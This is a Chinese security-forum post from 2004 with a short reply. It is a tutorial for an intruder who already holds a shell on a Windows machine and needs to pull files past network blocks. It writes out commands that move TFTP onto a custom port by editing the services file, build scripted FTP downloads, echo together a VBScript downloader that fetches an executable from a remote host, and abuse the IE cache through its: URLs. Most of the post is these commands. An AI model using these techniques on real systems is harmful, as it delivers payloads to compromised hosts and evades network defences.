|
 | 作者: yimarong [yimarong]
 版主 |
登录 |
| 随着冲击波蠕虫的泛滥,互联网上限制重重,越来越不像样了。原本 正常的IPC$ 传送文件,TFTP传送文件的方法都在各种各样的网络设备 的限制下变的不可用了...又是这样那样的限制,呸,我们追求自由与 共享,我们要打破电脑集权!^_^ 本文给出了几种打破这种限制的方法,当然只是抛砖引玉! 本文是居于已经得到了一个有一定权限的SHELL.用IPC$传送文件和TFTP 传送文件不可行。实现在命令行下传送文件的其他方法. 一,TFTP+自定义端口 限制用TFTP传送文件,一般就是直接封69端口,我们在用TFTP传送 文件的时候,一般用tftp -i xxx.xxx.xxx.xxx get srv.exe来下载,TFTP 默认的是69端口,那么怎么才能改这个端口了?TFTPD32.exe等TFTP服务端 是可以自己设置端口的,这里就不多讲,只不过在设置后要重新启动一次 TFTP服务端。至于客户端 在system32driversetc文件夹下有一个services文件。打开如下: # Copyright (c) 1993-1999 Microsoft Corp. # # This file contains port numbers for well-known services defined by IANA # # format: # # <service name> <port number>/<protocol> [aliases...] [#<comment>] # echo 7/tcp echo 7/udp discard 9/tcp sink null discard 9/udp sink null systat 11/tcp users #Active users systat 11/tcp users #Active users ... tftp 69/udp #Trivial File Transfer ... 不难看出,69/udp就是定义tftp默认端口的,协议为udp。 好啦!具体怎么用只要这两句,其实就是比原来多加了一句改端口的: echo tftp 8300/udp > %systemroot%system32driversetcservices tftp -i xxx.xxx.xxx.xxx get srv.exe 注意:请先把tftp服务端端口设定为与自定义端口一样的,这里是8300。 安全点的做法: ren %systemroot%system32driversetcservices 1 echo tftp 8300/udp >2 copy 2+%systemroot%system32driversetc1 %systemroot%system32driversetcservices 二:ftp下载文件 ftp下载文件一般步骤如下: echo open xxx.xxx.xxx.xxx >ftp.txt echo user >>ftp.txt echo password >>ftp.txt echo binary >>ftp.txt [可选] echo get srv.exe >>ftp.txt echo bye >>ftp.txt ftp -s:ftp.txt del ftp.txt 这样srv.exe文件就下在下来了。 三:ftp+自定义端口 其实ftp自定义端口非常简单,只要在ip地址后面空格,紧跟自定义的端口就可以了,如下: echo open xxx.xxx.xxx.xxx 2121 >ftp.txt echo user >>ftp.txt echo password >>ftp.txt echo binary >>ftp.txt [可选] echo get srv.exe >>ftp.txt echo bye >>ftp.txt ftp -s:ftp.txt del ftp.txt 这里自定义端口为2121,只要和ftp服务端的端口一致就行拉。 四:写程序下载 脚本是非常好的东西,只要把源码保存到一个文件中就能运行。所以在shell下,用 echo语句直接写到一个文件中,在用相应的解释程序执行就可以啦。这里是一个程序 实例的简化: echo Set xPost = CreateObject("Microsoft.XMLHTTP") >webdown.vbs echo xPost.Open "GET","http://ip/3389.exe",0 >>webdown.vbs echo xPost.Send() >>webdown.vbs echo Set sGet = CreateObject("ADODB.Stream") >>webdown.vbs echo sGet.Mode = 3 >>webdown.vbs echo sGet.Type = 1 >>webdown.vbs echo sGet.Open() >>webdown.vbs echo sGet.Write(xPost.responseBody) >>webdown.vbs echo sGet.SaveToFile "3389.exe",2 >>webdown.vbs 然后执行cscript webdown.vbs就可以啦.其中,http://ip/srv.exe改成你放文件的网站路径,srv.exe可以改成保存文件的路径。 五:START ITS:HTTP://IP/文件名 然后cd "C:Documents and SettingsDefault UserLocal SettingsTemporary Internet FilesContent.IE5" 然后DIR 文件名[1] 注意:那串长文件名要用""引起来,因为有空格 例子:C:Documents and SettingsAdministrator>start its:http://xxx.xxx.xxx.xxx/srv.exe C:Documents and SettingsAdministrator>dir /s srv[1].exe 驱动器 C 中的卷没有标签。 卷的序列号是 D491-7A7F C:Documents and SettingsAdministratorLocal SettingsTemporary Internet FilesContent.IE5\0AB3MNO1 的目录 2003-11-22 17:48 12,832 srv[1].exe 1 个文件 12,832 字节 列出所有文件: 1 个文件 12,832 字节 0 个目录 6,425,985,024 可用字节 C:Documents and SettingsAdministrator>copy C:Documents and SettingsAdministratorLocal SettingsTemporary Internet FilesContent.IE5\0AB3MNO1srv[1].exe c:srv.exe 已复制 1 个文件。 其他方法希望大家自己发现 感觉挺有实用价值的,就转了过来! |
| 地主 发表时间: 04-02-05 17:56 |
 | 回复: NetPolaris [newmyth21] 论坛用户 |
登录 |
那我就顶一下吧 |
| B1层 发表时间: 04-02-05 19:39 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 网吧专题 标题: 突破网络传输限制!~转